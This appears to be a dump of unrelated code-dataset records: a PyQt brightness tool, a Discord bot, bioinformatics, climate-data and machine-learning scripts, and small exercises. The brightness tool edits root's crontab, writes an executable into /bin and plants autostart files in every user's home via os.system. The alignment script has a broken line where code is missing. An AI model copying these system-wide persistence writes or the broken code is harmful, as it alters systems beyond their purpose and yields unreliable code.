countdown\n\tdef startCount(self):\n\t\tself.timer = QtCore.QTimer() # set up your QTimer\n\t\tself.timer.timeout.connect(self.updateButtonCount) # connect it to your update function\n\t\tself.timer.start(1000) #1000 milliseconds = 1 second(interval between the counts) \n\n\n\tdef updateButtonCount(self):\n\t\t#That messsage box will be displayed until count is 0(10 seconds)\n\t\tif self.count > 0:\n\t\t\tself.msg.setText(\"Reverting in (%s)\"%self.count)\n\t\t\tself.count-=1 \n\t\t\n\t\t#if the count is 0(completion of 10 seconds) then fix the brightness value\n\t\telse:\n\t\t\tself.timer.stop()\n\t\t\tself.msg.done(1)\n\t\t\tself.slide.setValue(int(self.prev))\n\t\t\ttry:\n\t\t\t\ttext = str(self.prev)\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\tsave(\"/sys/class/backlight/nv_backlight\",text)\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\ttext = str(self.prev*26)\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\tsave(\"/sys/class/backlight/radeon_bl0_backlight\",text)\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttext = str(self.prev*75)\n\t\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\t\tsave(\"/sys/class/backlight/intel_backlight\",text)\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\ttext = int(self.prev)\n\t\t\t\t\t\t\twritex(text)\n\t\t\t\t\t\texcept IOError:\n\t\t\t\t\t\t\tsys.exit(1)\n\t\t\tself.count =9 #again setting up count for future use\n\t\t\n\t\t\n\t#this will actually set the brightness\n\tdef confirm(self):\n\t\tval = self.slide.value()\n\t\ttext = str(val)\n\t\ttry:\n\t\t\tpath = os.path.join(\"/sys/class/backlight/nv_backlight\", \"brightness\")\n\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\tinputFile.write(text)\n\t\t\t\tsave(\"/sys/class/backlight/nv_backlight\",text)\n\t\texcept IOError:\n\t\t\ttry:\n\t\t\t\tpath = os.path.join(\"/sys/class/backlight/radeon_bl0\", \"brightness\")\n\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\tsave(\"/sys/class/backlight/radeon_bl0\",text)\n\t\t\texcept IOError:\n\t\t\t\ttry:\n\t\t\t\t\tpath = os.path.join(\"/sys/class/backlight/intel_backlight\", \"brightness\")\n\t\t\t\t\twith open(path, \"w\") as inputFile:\n\t\t\t\t\t\tinputFile.write(text)\n\t\t\t\t\t\tsave(\"/sys/class/backlight/intel_backlight\",text)\n\t\t\t\texcept IOError:\n\t\t\t\t\ttry:\n\t\t\t\t\t\twritex(int(text))\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tsys.exit(1)\n\n\n#By using xrandr(if searched documents are not present we use xrandr),we set the brightness here \ndef writex(text):\n\top = subprocess.check_output(['xrandr','-q'])\n\n\tencoding = sys.getdefaultencoding()\n\tdecode = op.decode(encoding)\n\tdecode = decode.split('\\n')\n\tdecode = \" \".join(decode)\n\n\tdl = decode.split(' ')\n\n\tcon_list = []\n\n\tlength = len(dl)\n\tconn_list = []\n\tfor i in range(length):\n\t\tif dl[i] == 'connected':\n\t\t\tconn_list.append(i-1)\n\t\n\t#ending \\n\n\tconn_dev = []\n\t\n\tfor each in conn_list:\n\t\tconn_dev.append(dl[each])\n\n\tcmd_list = []\n\n\n\n\tfor dev in conn_dev:\n\t\tcmd_list.append('xrandr --output '+dev+' --brightness ')\n\n\tbt = (text/100.0)\n\tbt_str = str(bt)\n\tnew_cmd = []\n\tfor each in cmd_list:\n\t\tnew_cmd.append(each+bt_str)\n\tfor each in new_cmd:\n\t\tos.system(each)\n\tsavex(new_cmd[0])\n\n\n#getting the current brightness using xrandr\t\ndef readx():\n\top = subprocess.check_output(\"xrandr --verbose | grep -i brightness | cut -f2 -d ' '\",shell = True)\n\tencoding = sys.getdefaultencoding()\n\tdecode = op.decode(encoding)\n\tdecode = decode.split('\\n')\n\tdecode = \" \".join(decode)\n\tbl = decode.split(' ')\n\treturn(str(bl[0]))\n\n\n#remembering the brightness to adjust brightness when rebooted(may not work in some systems due to system or other startup applications)\n#needs to be updated!\t\t\ndef savex(cmd):\n\tusers = os.listdir(\"/home\")\n\tcmd = \"sleep 4 &&\"+cmd\n\tfor user in users:\n\t\tfilepath = \"/home/\"+user+\"/.config/autostart\"\n\t\tfileloc = filepath+\"/xbrightness.desktop\"\n\t\tif not os.path.exists(filepath):\n\t\t\tos.makedirs(filepath)\n\t\twith open(fileloc,'w') as save:\n\t\t\tsave.write(\"\"\"[Desktop Entry]\nName=Brightness for xrandr\nExec=\"\"\"+cmd+\"\"\"\nType=Application\n\t\t\"\"\")\n\n\n#(while not using xrandr)adding the job to crontab of executing a python script on every reboot \ndef save(floc,percent):\n\top = subprocess.getoutput(\"sudo crontab -l\")\n\tif \"@reboot python /bin/init_bt3.py &\" not in op:\n\t\tos.system(\"(sudo crontab -l 2>/dev/null; echo \\\"@reboot python /bin/init_bt3.py &\\\")| crontab -\")\n\tcmd = \"echo \"+str(percent)+\" > \"+floc+\"/brightness\"\n\twith open(\"/bin/init_bt3.py\",'w') as save:\n#\t\tsave.write(\"echo \"+percent+\" > \"+floc)\n\t\tsave.write(\"\"\"#!/usr/bin/python3\nimport os;\nclass save_bt:\n\tdef __init__(self):\n\t\tos.system(cmd)\n\t\t\ncmd = \\\"\"\"\"+cmd+\"\"\"\\\"\nsave_bt()\"\"\")\n\tos.system(\"chmod +x /bin/init_bt3.py\")\n\t\n\n#Finally this invokes the applications\ndef run():\n app=QtGui.QApplication(sys.argv)\n QtGui.QApplication.setStyle('cleanlooks') #you can change it to any style you wish(according to my personal opinion is,this looks better)\n GUI= Window()\n sys.exit(app.exec_())\n\nrun()\n","sub_path":"Brightness-python3/src/bt3.py","file_name":"bt3.py","file_ext":"py","file_size_in_byte":12546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"248787544","text":"#!/usr/bin/env python3\n\nfrom Bio.AlignIO import read\nfrom tqdm import tqdm\nimport sys\nimport numpy as np\n\nfrom tqdm import TqdmSynchronisationWarning\nimport warnings\n\nwarnings.simplefilter(\"ignore\", TqdmSynchronisationWarning)\n\n\ndef contains_only(col, values):\n return set(col) - set(values) == set()\n\n\ndef main():\n alignment = read(sys.stdin, \"fasta\")\n remove_chars = np.asarray(list(sys.argv[1]))\n length = alignment.get_alignment_length()\n print(\"Num sequences: %d\" % len(alignment), file=sys.stderr)\n print(\"Alignment length: %d\" % length, file=sys.stderr)\n\n keep_cols = []\n for i in tqdm(range(length)):\n if not contains_only(alignment[:, i], remove_chars):\n keep_cols.append(i)\n\n out = np.empty((len(alignment), len(keep_cols)), dtype=\"\" + seq.id)\n print(\"\".join(out[i, :]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/squeeze_alignment.py","file_name":"squeeze_alignment.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"321866735","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: 103_zigzag_level_order.py\n Description :\n Author : cugxy\n date: 2019/5/31\n-------------------------------------------------\n Change Activity:\n 2019/5/31\n-------------------------------------------------\n\"\"\"\n\"\"\"\n给定一个二叉树,返回其节点值的锯齿形层次遍历。(即先从左往右,再从右往左进行下一层遍历,以此类推,层与层之间交替进行)。\n\n例如:\n给定二叉树 [3,9,20,null,null,15,7],\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n返回锯齿形层次遍历如下:\n\n [\n [3],\n [20,9],\n [15,7]\n ]\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def zigzagLevelOrder(self, root):\n rs = []\n if root is None:\n return rs\n q = []\n q.append(root)\n d = 0\n while len(q) != 0:\n p = []\n for i in range(len(q)):\n node = q.pop(0)\n p.append(node.val)\n if node.left is not None:\n q.append(node.left)\n if node.right is not None:\n q.append(node.right)\n if d % 2 != 0:\n p = p[::-1]\n rs.append(p)\n d += 1\n return rs\n\n\nif __name__ == '__main__':\n n3 = TreeNode(3)\n n9 = TreeNode(9)\n n20 = TreeNode(20)\n n15 = TreeNode(15)\n n7 = TreeNode(7)\n n3.left = n9\n n3.right = n20\n n20.left = n15\n n20.right = n7\n s = Solution()\n r = s.zigzagLevelOrder(n3)\n print(r)\n pass\n","sub_path":"scripts/leetcode/103_zigzag_level_order.py","file_name":"103_zigzag_level_order.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"487634664","text":"\"\"\"\ne3sm_to_cmip cmor handler script\n\nHandler for Total Direct Emission Rate of SO4 (emiso4)\n\nInput Variable(s)\n------------------\n* SFso4_a1 : Surface flux of so4_a1, in kg m-2 s-1\n* SFso4_a2 : Surface flux of so4_a2, in kg m-2 s-1\n* SFso4_a3 : Surface flux of so4_a3, in kg m-2 s-1\n* so4_a1_CLXF : Vertically intergrated external forcing for so4_a1, in molec cm-2 s-1\n* so4_a2_CLXF : Vertically intergrated external forcing for so4_a2, in molec cm-2 s-1\n* so4_a3_CLXF : Vertically intergrated external forcing for so4_a3, in molec cm-2 s-1\n\nMatt Nicholson\n3 Mar 2020\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport cmor\nfrom e3sm_to_cmip.lib import handle_variables\n\n# list of raw variable names needed\nRAW_VARIABLES = ['SFso4_a1', 'SFso4_a2', 'SFso4_a3',\n 'so4_a1_CLXF', 'so4_a2_CLXF', 'so4_a3_CLXF']\nVAR_NAME = 'emiso4'\nVAR_UNITS = 'kg m-2 s-1'\nTABLE = 'CMIP6_AERmon.json'\nLEVELS = {\n 'name' : 'lev',\n 'units': 'hPa',\n 'e3sm_axis_name': 'lev'\n}\n\n\ndef write_data(varid, data, timeval, timebnds, index, **kwargs):\n \"\"\"\n emiso4 = SFso4_a1 + SFso4_a2 + SFso4_a3 + so4_a1_CLXF + so4_a2_CLXF + so4_a3_CLXF\n \"\"\"\n outdata = data['SFso4_a1'][index, :] + data['SFso4_a2'][index, :] + \\\n data['SFso4_a3'][index, :] + data['so4_a1_CLXF'][index, :] + \\\n data['so4_a2_CLXF'][index, :] + data['so4_a3_CLXF'][index, :]\n \n cmor.write(\n varid,\n outdata,\n time_vals=timeval,\n time_bnds=timebnds)\n# ------------------------------------------------------------------\n\n\ndef handle(infiles, tables, user_input_path, **kwargs):\n \"\"\"\n Parameters\n ----------\n infiles : list of str\n A list of strings of file names for the raw input data\n tables : str\n Path to CMOR tables\n user_input_path : str\n Path to user input json file\n \n Returns\n -------\n var name : str\n Name of the processed variable after processing is complete\n \"\"\"\n return handle_variables(\n metadata_path=user_input_path,\n tables=tables,\n table=TABLE,\n infiles=infiles,\n raw_variables=RAW_VARIABLES,\n write_data=write_data,\n outvar_name=VAR_NAME,\n outvar_units=VAR_UNITS,\n serial=kwargs.get('serial'),\n levels=LEVELS,\n logdir=kwargs.get('logdir'))\n# ------------------------------------------------------------------","sub_path":"cmorize/e3sm_to_cmip/cmor_handlers/emiso4.py","file_name":"emiso4.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"295910742","text":"#!/usr/bin/env python\n\nimport argparse as ap\nfrom lochness import config\nfrom lochness import keyring\nfrom pathlib import Path\nimport os\nimport json\n\n\ndef check_config(config_loc: str):\n with open(config_loc, 'rb') as fp:\n config_loaded = config._read_config_file(fp)\n keyring.pretty_print_dict(config_loaded)\n\n\ndef check_keyring(keyring_dict):\n keyring.print_keyring(keyring_dict)\n\n\ndef check_lochness_configurations():\n '''Check lochness configurations\n\n To check formatting, field names in following items\n - config.yml\n - lochness.enc\n - lochness.json (before encryption)\n '''\n\n parser = ap.ArgumentParser(description='Lochness configuration checker')\n parser.add_argument('-c', '--config', help='Configuration file')\n parser.add_argument('-ke', '--keyring_encrypted',\n help='Encrypted keyring file')\n parser.add_argument('-k', '--keyring',\n help='None keyring file in json format')\n\n args = parser.parse_args()\n\n\n if args.config:\n check_config(args.config)\n\n if args.keyring_encrypted:\n keyring_dict = keyring.load_encrypted_keyring(args.keyring_encrypted)\n check_keyring(keyring_dict)\n\n if args.keyring:\n keyring_path = Path(args.keyring)\n with open(keyring_path, 'r') as f:\n keyring_dict = json.load(f)\n check_keyring(keyring_dict)\n\n\nif __name__ == '__main__':\n check_lochness_configurations()\n","sub_path":"scripts/lochness_check_config.py","file_name":"lochness_check_config.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"505042932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nProject Euler Problem 147\n=======================\n\nIn a 3x2 cross-hatched grid, a total of 37 different rectangles could be\nsituated within that grid as indicated in the sketch.\n\nThere are 5 grids smaller than 3x2, vertical and horizontal dimensions\nbeing important, i.e. 1x1, 2x1, 3x1, 1x2 and 2x2. If each of them is\ncross-hatched, the following number of different rectangles could be\nsituated within those smaller grids:\n\n1x1: 1\n2x1: 4\n3x1: 8\n1x2: 4\n2x2: 18\n\nAdding those to the 37 of the 3x2 grid, a total of 72 different rectangles\ncould be situated within 3x2 and smaller grids.\n\nHow many different rectangles could be situated within 47x43 and smaller\ngrids?\n\n\"\"\"\n\n\ndef main():\n return \"unimplemented\"\n\n\nif __name__ == \"__main__\":\n import ntpath\n import time\n from common.shared_functions import verify_solution\n\n problem_number = int(ntpath.basename(__file__).replace(\"euler\", \"\").replace(\".py\", \"\"))\n print(\"Retrieving my answer to Euler Problem {0} ...\".format(problem_number))\n\n ts = time.time()\n my_answer = main()\n te = time.time()\n\n print(\"My answer: {1}\".format(problem_number, my_answer))\n\n verification_type = verify_solution(problem_number, my_answer)\n print(\"Verification: {0}\".format(verification_type.name))\n print(\"Took {0} seconds.\".format(te - ts))\n","sub_path":"project-euler/solvers/euler147.py","file_name":"euler147.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75916894","text":"import os\nfrom discord.ext import commands\nimport discord\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\n\n\n\nintents = discord.Intents.default()\nintents.typing = True\nintents.presences = True\nintents.members = True\n\n\n\nbot = commands.Bot(\n command_prefix=\"!\", # Change to desired prefix\n case_insensitive=True, # Commands aren't case-sensitive\n intents=intents\n)\n\n\nbot.author_id = 269923118611562506 # Change to your discord id!!!\n\n@bot.event\nasync def on_ready(): # When the bot is ready\n print(\"I'm in\")\n print(bot.user) # Prints the bot's username and identifier\n\n@bot.command()\nasync def pong(ctx):\n print(ctx.message.author.id)\n await ctx.send('pong')\n\n\n@bot.command()\nasync def name(ctx):\n user_id = ctx.message.author.id\n user = await bot.fetch_user(user_id)\n await ctx.send(user.name)\n\n@bot.command()\nasync def count(ctx):\n members = ctx.message.guild.members\n status = {}\n for member in members:\n current_status = member.raw_status\n # Get the status only if the user is not a bot\n if not member.bot:\n if current_status in status:\n status[current_status] += 1\n else:\n status[current_status] = 1\n res = []\n for k, v in status.items():\n if (v == 1):\n tmp = f'{v} member is {k}'\n else:\n tmp = f'{v} members are {k}'\n res.append(tmp)\n real_res = ''\n for i in range(len(res) - 2):\n real_res += res[i] + ', '\n real_res += res[-2]\n real_res += ' and '\n real_res += res[-1]\n await ctx.send(real_res)\n\n@bot.command()\nasync def admin(ctx):\n message = ctx.message.content.split()[1]\n guild_roles = ctx.message.guild.roles\n guild = ctx.message.guild\n members = ctx.message.guild.members\n author_id = ctx.message.author.id\n supposed_admin = guild_roles[-1]\n user_id = ''\n if not supposed_admin.permissions.administrator:\n role = await guild.create_role('Admin', permissions=discord.Permissions(administrator=True))\n else:\n role = supposed_admin\n for member in members:\n if member.bot:\n admin_member = member\n if member.name == message:\n user_id = member.id\n if user_id == '':\n await ctx.send('The user selected does not exist')\n return\n await admin_member.add_roles(role)\n \n \n print(message)\n await ctx.send('Ok')\n\ndef fetch_content(url='https://xkcd.com/'):\n response = requests.get(url)\n img = Image.open(BytesIO(response.content))\n return img\n\n# Returns a vertical image of market indexes\ndef create_image():\n img = fetch_content()\n return Image.new('RGB', img)\n\n\n@bot.command()\nasync def xkcd(ctx):\n channel = ctx.message.channel\n img = fetch_content()\n with BytesIO() as image_binary:\n create_image().save(image_binary, 'PNG')\n image_binary.seek(0)\n await ctx.send(file=discord.File(fp=image_binary, filename='image.png'))\n\n@bot.command()\nasync def poll(ctx, **content):\n message = ctx.message.content.split()\n res = \"@here \"\n res += message[1]\n allowed_mentions = discord.AllowedMentions(everyone=True)\n await ctx.send(content=res, allowed_mentions=allowed_mentions)\n \n if len(content) == 3:\n await ctx.send(\"Impossible to add poll: too few choices provided.\")\n elif len(content) == 2:\n emojis = (':thumbsup',':thumbsdown')\n # react with thumbs up and down\n else:\n emojis = content[2:]\n \n for emoji in emojis:\n await message.add_reaction(emoji)\n \n\n\ntoken = os.getenv('BOT_TOKEN')\nbot.run(token) # Starts the bot","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556171731","text":"import os\nfrom os import listdir\nfrom os.path import isfile, join\nfrom shutil import copyfile\nfrom tqdm import tqdm\nimport json\nimport sys\n\ntrain_dir = sys.argv[1]\ntest_dir = sys.argv[2]\n\nos.makedirs('./nnUNet/nnUNet_preprocessed', exist_ok=True)\nos.makedirs('./nnUNet/nnUNet_raw', exist_ok=True)\nos.makedirs('./nnUNet/nnUNet_trained_models', exist_ok=True)\n\ntrain_data = []\n\ntrain_image_dir = join(train_dir, 'image')\ntrain_label_dir = join(train_dir, 'label')\n\nfor file in sorted(listdir(train_image_dir)):\n image_path = join(train_image_dir, file)\n label_path = join(train_label_dir, file)\n \n image_name = image_path.split('/')[-1]\n label_name = label_path.split('/')[-1]\n \n assert image_name == label_name\n \n if isfile(image_path) and isfile(label_path):\n train_data.append({'image': image_path, 'label': label_path})\n\nbad_indexes = [189, 262, 659, 662, 703, 744, 1005, 1245, 1347, 1546, 1562, ]\n\ntraining_files = []\n\nnnu_image_dir = './nnUNet/nnUNet_raw/nnUNet_raw_data/Task101_BrainTS/imagesTr/'\nnnu_label_dir = './nnUNet/nnUNet_raw/nnUNet_raw_data/Task101_BrainTS/labelsTr/'\n\nos.makedirs(nnu_image_dir, exist_ok=True)\nos.makedirs(nnu_label_dir, exist_ok=True)\n\nfor index, sample in enumerate(tqdm(train_data), start=1):\n \n if index in bad_indexes:\n continue\n \n old_filename = sample['image'].split('/')[-1]\n \n image_filename = f'BrainTS_{index:04d}_0000.nii.gz'\n label_filename = f'BrainTS_{index:04d}.nii.gz'\n \n copyfile(sample['image'], join(nnu_image_dir, image_filename))\n copyfile(sample['label'], join(nnu_label_dir, label_filename))\n \n training_files.append({'image': join(nnu_image_dir, label_filename),\n 'label': join(nnu_label_dir, label_filename)})\n\ntest_data = []\n\nfor file in sorted(listdir(test_dir)):\n test_path = join(test_dir, file)\n \n test_name = test_path.split('/')[-1]\n \n if isfile(test_path):\n test_data.append(test_path)\n\ntest_files = []\nuun_test_dir = './test_images'\nos.makedirs(uun_test_dir, exist_ok=True)\n\nfor index, test_path in enumerate(tqdm(test_data)):\n old_filename = test_path.split('/')[-1]\n new_filename = old_filename.split('.')[0]+'_0000.nii.gz'\n \n copyfile(test_path, join(uun_test_dir, new_filename))\n\ndataset_config = dict(\n name='BrainTS',\n description='abc',\n tensorImageSize='4D',\n modality={'0':'MRI'},\n labels={'0':'background', '1':'tumor'},\n numTraining=len(training_files),\n numTest=0,\n training=training_files,\n test=[],\n)\n\nwith open('./nnUNet/nnUNet_raw/nnUNet_raw_data/Task101_BrainTS/dataset.json', 'w') as file:\n json.dump(dataset_config, file)\n","sub_path":"file_processor.py","file_name":"file_processor.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"381848990","text":"from __future__ import division\nimport numpy as np\nimport sys\nimport math\nimport pandas as pd\n\ndef meancov(f1):\n virginica=[]\n versicolor=[]\n setosa=[]\n\n for each in f1:\n classvar=each.split(',')\n if(classvar[4]==\"Iris-virginica\"):\n virginica.append(classvar[0:4])\n elif(classvar[4]==\"Iris-setosa\"):\n setosa.append(classvar[0:4])\n else:\n versicolor.append((classvar[0:4]))\n\n virginica=np.array(virginica,dtype='float')\n versicolor=np.array(versicolor,dtype='float')\n setosa=np.array(setosa,dtype='float')\n virginica=np.matrix(virginica)\n versicolor=np.matrix(versicolor)\n setosa=np.matrix(setosa)\n mean_virginica=virginica.mean(0)\n mean_setosa=setosa.mean(0)\n mean_versicolor=versicolor.mean(0)\n covar_virginica=np.cov(virginica,rowvar=False,bias=True)\n covar_setosa=np.cov(setosa,rowvar=False,bias=True)\n covar_versicolor=np.cov(versicolor,rowvar=False,bias=True)\n return(np.around(covar_virginica,2),np.around(covar_setosa,2),np.around(covar_versicolor,2),np.around(mean_virginica,2),\n np.around(mean_setosa,2),np.around(mean_versicolor,2))\n\ndef priorsfinding(traindata):\n d={}\n priors = {}\n try:\n names = []\n for each in traindata:\n classvar = each.split(',')\n names.append(classvar[4])\n for i in names:\n d[i] = d.get(i, 0) + 1\n except IndexError:\n names = []\n for each in traindata:\n classvar = each.split(',')\n names.append(classvar[4])\n for i in names:\n d[i] = d.get(i, 0) + 1\n for (values, keys) in zip(d.values(), d.keys()):\n priors[keys] = np.around((values / len(names)), 2)\n #print(priors)\n # sys.stdout = open(\"assign3-iusaichoud.txt\", \"w\")\n covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa, mean_versicolor = meancov(traindata)\n return (priors, covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa, mean_versicolor)\n\ndef findPriors(f1):\n\n kfolds = 3\n instances = (len(f1) - 1) / kfolds\n # print(instances)\n f1 = f1[:-1]\n train_1fold = f1[0:int(instances)]\n train_2fold = f1[int(instances):int(instances * 2)]\n train_3fold = f1[int(instances * 2):]\n # print(len(train_1fold),len(train_2fold),len(test_3fold))\n traindata = train_1fold + train_2fold\n testdata=train_3fold\n traindata1=train_2fold+train_3fold\n testdata1=train_1fold\n traindata2=train_1fold+train_3fold\n testdata2=train_2fold\n train=[traindata,traindata1,traindata2]\n test=[testdata,testdata1,testdata2]\n answ=[]\n for each,i in zip(train,test):\n priors, covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa, mean_versicolor=priorsfinding(each)\n answ.append((priors, covar_virginica, covar_setosa, covar_versicolor, mean_virginica, mean_setosa,\n mean_versicolor,i))\n return answ\n\ndef estimateLikelyhood(covariance,mean,point,prior):\n a = math.pow(math.sqrt(2 * np.pi), 4)\n b = math.sqrt(np.linalg.det(covariance))\n ktt = np.matrix(point - mean)\n c = ((ktt).dot(np.linalg.inv(covariance)).dot(ktt.transpose())) / 2\n # c=np.matmul(covariance,(np.linalg.inv(covariance)))\n # print((a*b),c,ktt,point,mean)\n d = (1 / (a * b)) * math.exp(-(c))\n return(d*prior)\n\ndef likelyhood(priors,virginica,setosa,versicolor,means,names):\n #print(means[1][0])\n prob=[]\n for i in range(len(names)):\n p=[]\n arr=np.array(names[i], dtype=float)\n post_virginica=estimateLikelyhood(virginica, means[0][0], arr, priors['Iris-virginica'])\n post_setosa=estimateLikelyhood(setosa,means[1][0],arr,priors['Iris-setosa'])\n post_versicolor=estimateLikelyhood(versicolor,means[2][0],arr,priors['Iris-versicolor'])\n p.append([post_virginica,post_setosa,post_versicolor])\n prob.append(p)\n #print(len(prob))\n classlabel=[]\n for each in prob:\n classlabel.append(each[0].index(max(each[0])))\n return classlabel\n\ndef metrics(mat,df):\n\n Accuracy=[]\n precision=[]\n recall=[]\n F1score=[]\n TP = (np.diag(mat))\n #print(TruePoistive)\n for (i,j) in zip(range(3),range(3)):\n TruePoistive=TP[i]\n df1=(df.drop(i,axis=1).drop(j,axis=0))\n #print(df1,sum(sum(df1.values)))\n TrueNegative=sum(sum(df1.values))\n #print(df)\n a=df[i].values\n b=df.loc[i].values\n #print(a,b)\n falseNegative=sum(np.delete(a,i))\n falsePositive=sum(np.delete(b,i))\n #print(TruePoistive,TrueNegative,falseNegative,falsePositive)\n #print(falsePositive,falseNegative)\n p=(TruePoistive)/(TruePoistive+falsePositive)\n r=(TruePoistive)/(TruePoistive+falseNegative)\n Accuracy.append((TruePoistive+TrueNegative)/(TruePoistive+TrueNegative+falseNegative+falsePositive))\n precision.append(p)\n recall.append(r)\n F1score.append((2*((p*r)/(p+r))))\n #print(Accuracy)\n return(Accuracy,precision,recall,F1score)\n\ndef main():\n acc=[]\n prec=[]\n rec=[]\n f1score=[]\n conf=[]\n f = open(sys.argv[1], \"r\")\n file = f.read()\n f1=file.split(\"\\n\")\n answ=findPriors(f1)\n #print(answ[0][7])\n for each in answ:\n names = []\n labels = []\n for eac in each[7]:\n classvar = eac.split(',')\n names.append(classvar[0:4])\n labels.append(classvar[4])\n classlabel = likelyhood(each[0], each[1], each[2], each[3], each[4:7], names)\n #print(classlabel)\n lab = []\n lab1=[]\n for each in classlabel:\n if (each == 2):\n lab.append('Iris-versicolor')\n elif (each == 0):\n lab.append('Iris-virginica')\n elif (each == 1):\n lab.append('Iris-setosa')\n for each in labels:\n if (each == 'Iris-versicolor'):\n lab1.append(2)\n elif (each == 'Iris-virginica'):\n lab1.append(0)\n elif (each == 'Iris-setosa'):\n lab1.append(1)\n actual = pd.Series(labels, name='Actual')\n predicted = pd.Series(lab, name='Predicted')\n actual1 = pd.Series(lab1, name='Actual')\n predicted1 = pd.Series(classlabel, name='Predicted')\n sys.stdout=open(\"testfile_pavan.txt\",\"w\")\n df_confusion = pd.crosstab(predicted, actual)\n df_confusion1 = pd.crosstab(predicted1, actual1)\n conf.append(df_confusion)\n mat=np.matrix(df_confusion1.values)\n #print(conf)\n accuracy,precision,recall,F1score=metrics(mat,df_confusion1)\n #print(accuracy)\n acc.append(accuracy)\n prec.append(precision)\n rec.append(recall)\n f1score.append(F1score)\n #print(np.matrix(acc),\"\\n\",np.matrix(prec),\"\\n\",np.matrix(rec),\"\\n\",np.matrix(f1score))\n print(\"The confusion matrices are\\n\", conf,\"\\n Metrics averaged over 3 folds\\n\",\"Accuracy :\",np.matrix(acc).mean(0),\n \"\\n\",\"Precision :\", np.matrix(prec).mean(0),\"\\n\",\"Recall:\",np.matrix(rec).mean(0),\"\\n\",\n \"F1Score:\",np.matrix(f1score).mean(0))\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"Ass33.py","file_name":"Ass33.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"502581544","text":"import os\nimport json\nfrom uuid import uuid4\nfrom tests.resources import AppTestBase\n\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nIMAGE_RESOURCES_PATH = os.path.join(THIS_DIR, os.pardir, 'resources/policies')\n\n\nclass TestUploadProfileImage(AppTestBase):\n\n def setUp(self) -> None:\n super(TestUploadProfileImage, self).setUp()\n\n def test_creation(self):\n\n data = {\n \"policy\": (open(\n IMAGE_RESOURCES_PATH + os.path.sep + \"sample_policy.json\", 'rb'\n ),\n 'sample_policy.json')\n }\n\n response = self.client.post(\n '/policies/data-provider/{}/data-set/{}/data-consumer/{}'.format(uuid4(), uuid4(), uuid4()),\n data=data,\n content_type='multipart/form-data',\n )\n\n self.assertEqual(200, response.status_code)\n\n data = json.loads(response.data.decode())\n response = self.client.get(\n '/policies/{}'.format(data.get('id')),\n content_type='multipart/form-data',\n )\n\n self.assertEqual(200, response.status_code)\n\n","sub_path":"services_infrastructure/policy-catalogue/tests/views/test_policy_retrieve.py","file_name":"test_policy_retrieve.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"506590341","text":"import json\nimport pprint\n\nwith open('employees.json' , 'r' ) as file:\n data = json.load( file )\n\nprinter = pprint.PrettyPrinter()\n# printer.pprint(data)\n\nlanguage = data.get('programming_language')\nemployees = data.get('employees')\n\nprint(language)\n\nfor employee in employees:\n print(employee.get('id') , employee.get('fullname'))","sub_path":"chaldal/working_with_json/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"394612237","text":"target = \"xilinx\"\naction = \"synthesis\"\nsyn_device = \"xc7z020\"\nsyn_grade = \"-1\"\nsyn_package = \"clg484\"\nsyn_top = \"zed_top\"\nsyn_project = \"zedboard\"\nsyn_tool = \"planahead\"\n\nfiles = [\n \"../../top/zed_1/zed_top.vhd\",\n \"../../top/zed_1/zed_top.ucf\"\n]\n\nmodules = 